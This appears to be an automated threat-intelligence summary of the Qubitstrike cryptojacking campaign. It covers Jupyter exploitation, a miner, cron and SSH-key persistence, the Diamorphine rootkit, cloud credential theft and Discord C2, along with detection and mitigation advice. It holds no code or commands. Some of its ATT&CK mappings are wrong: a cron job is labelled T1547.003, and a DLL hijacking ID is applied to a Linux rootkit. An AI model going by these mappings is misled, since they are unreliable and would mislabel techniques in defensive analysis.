Full Report
Qubitstrike is a cryptojacking campaing targeting exposed Jupyter Notebooks, as they may allow to execute commands remotely. After obtaining a shell on the remote host, the shell script executes a cryptocurrency miner and establishes persistence using a cron job that inserts a...
Analysis Summary
# Tool/Technique: Qubitstrike
## Overview
Qubitstrike is a cryptojacking campaign that specifically targets exposed Jupyter Notebook environments to gain remote command execution capabilities. Once access is achieved, the campaign deploys cryptocurrency miners, establishes persistence, and installs a rootkit for evasion.
## Technical Details
- Type: Malware Campaign
- Platform: Linux/Cloud Environments (targeting exposed Jupyter Notebooks)
- Capabilities: Remote command execution via Jupyter exploitation, cryptocurrency mining, persistence establishment, rootkit installation, credential theft, and C2 communication.
- First Seen: October 18, 2023 (Publication Date)
## MITRE ATT&CK Mapping
Based on the described activities:
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (Jupyter Notebooks exploitation)
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- **TA0003 - Persistence**
- T1547.003 - Boot or Logon Autostarts: Cron Job
- **TA0005 - Defense Evasion**
- T1574.008 - Hijack Execution Flow: DLL Search Order Hijacking (Implied by Rootkit use)
- **TA0007 - Discovery**
- T1087.001 - Account Discovery: Local Account
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (Downloading miner/rootkit)
- T1071.001 - Application Layer Protocol: Web Protocols (Discord usage)
*Note: Specific ATT&CK mappings for the Diamorphine rootkit would involve deeper defense evasion techniques.*
## Functionality
### Core Capabilities
- **Initial Access:** Exploiting misconfigured and publicly exposed Jupyter Notebooks to execute remote commands.
- **Resource Hijacking:** Executing cryptocurrency mining software immediately after gaining a shell.
- **Persistence:** Establishing persistence via a cron job that modifies the `.ssh/authorized_keys` file, likely installing a backdoor SSH key.
### Advanced Features
- **Rootkit Deployment:** Capable of retrieving and installing the **Diamorphine rootkit** to hide malicious processes from standard system enumeration tools.
- **Credential Harvesting:** Specifically targets and transmits captured AWS and Google cloud credentials back to the threat actor.
- **C2 Communication:** Utilizes a Python implant communicating via **Discord** as a Command and Control mechanism. Payloads are hosted on `codeberg[.]org`.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Cryptocurrency miner script, Python implant, Diamorphine rootkit files]
- Registry Keys: [Not applicable/Not provided]
- Network Indicators:
- Hosting infrastructure: `codeberg[.]org` (for payload hosting)
- C2 mechanism: **Discord bot API/servers**
- Behavioral Indicators:
- Execution of shell scripts following Jupyter Notebook command execution.
- Creation/modification of scheduled jobs (cron jobs).
- Insertion of new entries into `~/.ssh/authorized_keys`.
- Outbound connections to Discord services for C2.
- High CPU usage indicative of cryptocurrency mining.
## Associated Threat Actors
- Unknown. Evidence suggests a possible connection to Tunisia based on the IP address used to log into a cloud honeypot with stolen credentials.
## Detection Methods
- **Signature-based detection:** Signatures for the specific miner malware and the Diamorphine rootkit.
- **Behavioral detection:** Monitoring for unusual command execution within Jupyter Notebook sessions, the addition of new SSH keys without user context, or suspicious cron job creation that alters the SSH authorized keys file.
- **YARA rules:** [Not provided in the text]
## Mitigation Strategies
- **Prevention:** Do not expose Jupyter Notebooks directly to the public internet without strong authentication and network segmentation.
- **Hardening recommendations:** Implement robust authentication measures (MFA) for development/notebook environments. Use hardened images and Principle of Least Privilege (PoLP). Regularly audit cron jobs for unauthorized additions. Monitor for the presence of the Diamorphine rootkit components.
## Related Tools/Techniques
- **Diamorphine:** A known Linux rootkit used for hiding malicious activity.
- **Credential Theft:** Techniques related to extracting AWS/Google Cloud credentials from the filesystem.
- **Misconfigured Consul Abuse, Credential Theft, Create SSH Backdoor:** Mentioned as observed techniques within the broader context of the incident.